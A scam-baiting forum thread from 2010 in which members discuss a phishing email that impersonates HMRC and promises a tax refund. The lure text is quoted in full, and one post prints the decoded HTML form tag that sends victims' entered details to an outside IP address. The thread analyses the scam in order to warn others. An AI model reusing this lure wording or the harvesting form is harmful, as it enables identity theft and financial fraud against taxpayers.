SmartFeedSmartFeed          

WELCOME - YOU ARE CURRENTLY VIEWING 419EATER AS A GUEST

By joining our community you will have the ability to post topics and access other forums reserved for members. Registration is quick, simple and absolutely free. Join our community today by clicking here.

ScamWarners.com - Internet Anti-Fraud Center - now open!

HMRC Refund

View next topic
View previous topic

OfffffTopic
Master Baiter

PostPosted: Sun Aug 22, 2010 11:29 pm Reply with quoteBack to top

Recieved this in my emails the other day. Also attached was form to fill in Ive uploaded here so you can see. Not sure if there are any viruses or malware involved, if someone could let me know because Ive clicked it already (after scanning the file) http://drop.io/scamform2222

Sent: 18 August 2010 18:36:36

Quote:
Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP
Due to the high volume of refunds you must complete the online application.

Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

In order to process your refund you will need to complete the attached application form.

Note: If you are using Internet Explorer please allow ActiveX for scripts to perform all data transfers securely .

-----------------------------------------------------------------------------
Regards,
HMRC

Copyright 2010, hmrc.gov.uk All rights reserved.

sharky1969
Eager Beaver Baiter

PostPosted: Mon Aug 23, 2010 8:55 am Reply with quoteBack to top

OfffffTopic wrote:
Recieved this in my emails the other day. Also attached was form to fill in Ive uploaded here so you can see. Not sure if there are any viruses or malware involved, if someone could let me know because Ive clicked it already (after scanning the file) http://drop.io/scamform2222

Sent: 18 August 2010 18:36:36

Quote:
Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP
Due to the high volume of refunds you must complete the online application.

Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

In order to process your refund you will need to complete the attached application form.

Note: If you are using Internet Explorer please allow ActiveX for scripts to perform all data transfers securely .

-----------------------------------------------------------------------------
Regards,
HMRC

Copyright 2010, hmrc.gov.uk All rights reserved.

I have had one of these before. Called HMRC. They never send e-mails. Report it to HMRC.

Regards
Sharky 1969

but you naver send the money to me forget me please you are a big scam

Those bank people they are very very stupid ,they keep on sending me
form to fill

me know you are send fake MTCN to the bank that is not the not MTCN you are playing Game

Also, do note that we are a profit oriented company and to efficiently and speedily deliver your package to you, the cost of delivering ( C.O.D) your winnings has to be paid.
TaleSpinner
Wannabe Baiter

PostPosted: Mon Aug 23, 2010 2:12 pm Reply with quoteBack to top

Very clever phishing email. It pulls it's formatting and color scheme from https://online.hmrc.gov.uk/style/ck/hmrc.css to make it look like an official page. In addition, it contains a ton of links to real sites. The only trick is in obfuscated javascript, which after decoding reads:
Code:
<td><form action="http://222.143.253.23/www.hmrc.gov.uk/refund/" name="processForm" method="POST" onsubmit="return submitIt(this)">

So, any info you enter is directed to a server in China. Other than that, it doesn't appear to contain any malware.

Master of Master Baiters

PostPosted: Tue Sep 07, 2010 4:14 pm Reply with quoteBack to top

TaleSpinner wrote:
Very clever phishing email. It pulls it's formatting and color scheme from https://online.hmrc.gov.uk/style/ck/hmrc.css to make it look like an official page. In addition, it contains a ton of links to real sites. The only trick is in obfuscated javascript, which after decoding reads:
Code:
<td><form action="http://222.143.253.23/www.hmrc.gov.uk/refund/" name="processForm" method="POST" onsubmit="return submitIt(this)">

So, any info you enter is directed to a server in China. Other than that, it doesn't appear to contain any malware.

expect whole load of these following HMRC latest c*ck up

----------------------------------------
AMU NNA GI = YOU BIG COCK
Am not comfortable with this western union thing any more - Kelvin Smith
...i will get you down you asshole f*cking shit - Tom Bruce the hitlad

Jump to:   

View next topic
View previous topic